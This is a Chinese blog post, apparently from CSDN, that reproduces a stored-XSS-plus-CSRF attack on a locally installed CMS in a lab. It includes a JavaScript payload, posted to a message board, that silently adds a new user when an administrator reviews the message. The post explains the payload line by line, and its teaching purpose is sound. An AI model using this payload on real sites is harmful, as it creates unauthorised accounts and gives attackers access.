CSRF+XSS组合攻击实战

于 2024-07-19 14:10:56 发布
阅读量502 收藏 11
点赞数 10
分类专栏: 漏洞复现 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74342020/article/details/140547787
版权

目录

0x01安装靶场

0x02分析功能点的请求接口,构造恶意请求

0x03寻找xss漏洞

0x01安装靶场

下载源码,解压到网站根目录

1.修改数据库配置文件

打开源码,进入到include目录下,打开数据库配置文件database.inc.php

将数据库的用户名和密码修改为自己数据库的用户名和密码,数据库名可以不改。然后保存。

2.导入SQL文件

方法一:使用Navicat导入

打开navicate,新建数据库,名字写为刚才我们上面的数据库名,若没有修改,数据库名就是cms

右键点击我们刚才的数据库,选择运行SQL文件(若右键之后,运行SQL文件是灰色的,则先点击打开数据库)

选择源码下的install.sql文件

然后浏览器打开访问网站。

方法二:命令行方式导入

打开命令行,win+r,输入cmd,回车,在命令行界面输入mysql -u root -p

输入密码。

创建数据库 creat database cms

选中数据库use cms,导入sql文件,source sql文件地址

例如:source D:\phpstudy_pro\WWW\cms\install.sql

导入成功,打开浏览器访问网站。

访问路径:域名\cms\index.php

0x02分析功能点的请求接口,构造恶意请求

进入后台管理界面找到添加用户的功能点,进行抓包分析

管理员用户名admin,密码123456

添加用户,进行抓包

右键利用burpsuite自带的csrfPOC生成工具生成

把这个复制写到一个页面上,在登录到那个cms管理员账户的情况下,访问这个页面,就会发现用户里面多了一条用户记录。由于CSRF利用条件比较苛刻,需要受害者点击恶意请求。因此我们可需要借助XSS来扩大危害,借用XSS漏洞执行JS代码,让JS直接发起请求,从而不需要让受害者点击恶意请求了。

0x03寻找xss漏洞

编写恶意JS代码

<script> xmlhttp = new XMLHttpRequest(); xmlhttp.open("post","http://localhost:8083/cms/admin/user.action.php",false); xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded"); xmlhttp.send("act=add&username=zhang&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0"); </script>

代码说明

xmlhttp = new XMLHttpRequest();

  • 创建 XMLHttpRequest 对象XMLHttpRequest 是 JavaScript 用于与服务器进行交互的对象。在这里,创建了一个新的 XMLHttpRequest 对象 xmlhttp

xmlhttp.open("post", "http://localhost:8083/cms/admin/user.action.php", false);

  • 初始化请求

    • open() 方法用于初始化一个请求。这里指定了请求方法为 POST

    • 第一个参数 "post" 表示 HTTP 请求的方法是 POST。

    • 第二个参数 http://localhost:8083/cms/admin/user.action.php 是请求的 URL。

    • 第三个参数 false 表示同步请求(阻塞调用),即 JavaScript 执行将暂停,直到请求完成。

xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

  • 设置请求头setRequestHeader() 方法用于设置 HTTP 请求头。这里设置 Content-typeapplication/x-www-form-urlencoded,表示发送的数据将按照表单 URL 编码的方式进行编码。

xmlhttp.send("act=add&username=yuanboss&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");

  • 发送请求

    send()

    方法用于发送 HTTP 请求。这里发送的数据是一个 URL 编码的字符串:

    • "act=add":操作类型是“add”,表示要添加一个用户。

    • "username=zhang":用户名是“zhang”。

    • "password=123456""password2=123456":密码是“123456”,两次确认输入。

    • "button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7":提交按钮的值,URL 解码后是“添加用户”。

    • "userid=0":用户 ID 为0,通常表示新用户。

通过查询cms靶场,找到了一个留言板,因为留言板需要管理员去审核,所以可以进行一个存储型xss注入。

在留言板留言我们刚才构造的恶意JS代码,进行xss+csrf组合攻击

模仿管理员去审核留言

打开账号管理,查看账号

多了一条用户名为张的用户记录。

月敛苏时意
关注
  • 10
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CSRF+XSS组合实战
yuan_boss的博客
08-28 1661
由于CSRF利用条件比较苛刻,需要受害者点击恶意请求。因此我们可需要借助XSS来扩大危害,借用XSS漏洞执行JS代码,让JS直接发起请求,从而不需要让受害者点击恶意请求了。在实战中,如果我们发现了XSS存储型漏洞,我们也可以尝试寻找CSRF漏洞,进而扩大危害。
Csrf+Xss组合
蚁景网安学院
07-27 900
各位大师傅,第一次在合天发文章,请多多关照今年年初的疫情确实有点突然,打乱了上半年的所有计划(本来是校内大佬带我拿奖的时刻,没了,学长毕业了,就剩下我这个小垃圾带着下一届去搞ctf了,难...
CSRF02】跨站请求伪造——DVWA靶场实操(含CSRF+XSS协同攻击实验)
Fighting_hawk的博客
03-15 6883
1. 掌握网页相关语言中各种标签的运用; 2. 灵活使用XSS注入代码; 3. 掌握CSRF攻击的方法; 4. 掌握XSS+CSRF协同攻击的方法。
漏洞组合拳之XSS+CSRF记录
金色%夕阳的博客
08-20 608
漏洞组合拳之XSS+CSRF记录 0x00 前言 0x01 靶场环境 0x02 组合拳思路 0x03 【第一拳】存储型 XSS + CSRF 1、构造 POC 2、 开工 0x04 【第二拳】CSRF + SelfXSS 1、构造 POC 0x05 总结
xss+csrf组合拳这么玩
yggcwhat
05-28 899
xss+csrf组合拳这么玩
xss结合csrf实验】
一纸荒芜的博客
09-07 1787
通常xss漏洞可以和csrf漏洞结合使用,今天就做一个小的实验举例,漏洞主要利用的是用户修改敏感信息的未退出状态,并且修改信息不需要验证时很容易被伪造,当我们发现存在csrf漏洞时,可构造url请求信息,配合xss漏洞去配合诱导访问。本实验由本地搭建的pikachu靶场做演示。 本期简单介绍了xss漏洞与csrf漏洞的配合使用。
XSS+CSRF组合
banliyaoguai的博客
06-20 564
(案例中将使用cms靶场来进行演示)在实战CSRF利用条件十分苛刻,因为我们需要让受害者点击我们的恶意请求不是一件容易的事情。所以单单一个CSRF漏洞危害是很小的,所以我们为了扩大危害,就需要借助XSS漏洞与之配合。我们利用XSS漏洞让受害者执行JS代码,JS代码有发起请求的功能,借此功能我们配合CSRF漏洞达成我们的攻击。我们利用XSS执行JS代码的时候发起我们构造的恶意请求,从而能达到让受害者无感知地受到攻击。如何通过js发起请求,具体来说有以下步骤创建实例发出 HTTP 请求。
CSRFXSS漏洞结合实战案例
一个努力学习网安的小牛马
11-13 282
攻击者利用JavaScript可以构造请求的功能在留言面板构造一个存储型xss注入,里面的内容为js请求。请求新添加用户,注入完成后管理员访问留言管理时后台自动添加用户。经过在网站下载的源码我们分析到添加用户的页面在user.action.php的页面使用post传递了三个参数。用JavaScript编写一个请求将三个参数传递过去。分析网站源码找到添加用户的页面。受害者登录后台查看留言管理。但是后台已经创建用户了。
trace方法的利用,以及CSRF+XSS的一些思路
weixin_51681694的博客
05-01 1177
trace方法的利用,以及CSRF+XSS组合拳的一些思路
Vue+Springboot电商实战
03-08
在实际开发过程中,还需要考虑如安全性(如使用HTTPS,防止XSSCSRF攻击)、性能优化(如CDN加速,图片懒加载)、用户体验(如页面加载速度,响应式设计)等方面的问题。此外,持续集成和持续部署(CI/CD)流程也是...
实战突击 JavaWeb 项目整合开发5
08-14
6. 安全性:JavaWeb项目需要考虑安全问题,例如防止SQL注入、XSS攻击CSRF攻击。Spring Security是一个常用的Java安全框架,可以提供身份验证、授权和访问控制等功能。 7. RESTful API设计:在现代Web开发中,...
web安全-dvwa实战
07-05
CSRF(跨站请求伪造):解释CSRF攻击是如何通过伪装用户合法请求来执行未授权的操作,以及如何在DVWA中模拟和防御此类攻击。 3。文件包含:说明文件包含漏洞是如何允许攻击者包含或执行系统中的文件,从而可能引发未...
PHP MySQL Apache超强组合pdg格式
10-18
5. **安全实践**:涵盖防止SQL注入、XSS攻击CSRF攻击的最佳做法。 6. **性能优化**:讨论如何优化PHP脚本、MySQL查询和Apache配置以提高系统性能。 7. **实战项目**:可能包含一些示例项目,帮助读者将所学知识...
PostgreSQL的逻辑架构
最新发布
weixin_41992498的博客
07-18 80
一、PostgreSql的逻辑架构:所有者:
【星海随笔】vCenter Server 和主机管理。
weixin_41997073的博客
07-16 193
1.方法:删除页面信息,然后断连这个受管主机,断开受管主机的连接不会将其从 vCenter Server 中移除,而只是临时挂起 vCenter Server 执行的所有监控活动。2.方法:在分布式存储中找到该虚拟设备的存储盘,文件里找到相关的vmdk磁盘文件,点击注册虚拟机。当资料不匹配时候,可以删除展示页面,孤立的设备的 匹配位置的信息。断开后,然后重新连接,既可以重新识别受监管的主机。数据库在Vserver中展示的是一个数据库的资料,应该是client的资料。1.确定为资料不匹配导致的展示问题。
Linux系统的用户组管理和权限以及创建用户
Johaden的博客
07-14 984
因此,我们可以根据每个用户的角色、职位和需求,为他们分配相应的权限,以确保服务器的安全性和有效管理。sudo(superuser do)是在类Unix操作系统中(包括Linux和macOS)常用的一个命令,它允许经过授权的用户以系统管理员(通常是root用户)的权限来运行程序或命令。2.在登陆Ubuntu时,会填写全名、用户名、密码等,所创建的这个用户就是默认用户,其中全名可以类似为一个昵称,用户名为主机名(较正式,不可随意更改)。超级用户可以执行系统上的所有命令,包括系统配置、文件访问和用户管理等。
Spring框架之DI依赖注入
G81948577的博客
07-18 499
我们在下面构建spring的过程中体会依赖注入;从上面的图中我们知道,在ssm框架中服务层(server)无法直接操作数据库,持久层(dao)是直接操作数据库进行数据处理的,但是我们如果在服务层有一个持久层的对象,然后我们在服务层通过对象去调用持久层的方法就可以操作数据库了。@OverrideSystem.out.println("持久层,你好");UserServiceImpl类中的代码如下@Override。
MySQL 其他
w1834938347的博客
07-15 689
SQL执行顺序from确定查询的表,jion连接表、on对from进行过滤,where进行条件过滤,group by和having进行分组后过滤,select进行指定的列,distinct去重,排序,限制行数定表过滤-分组过滤-选列过滤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值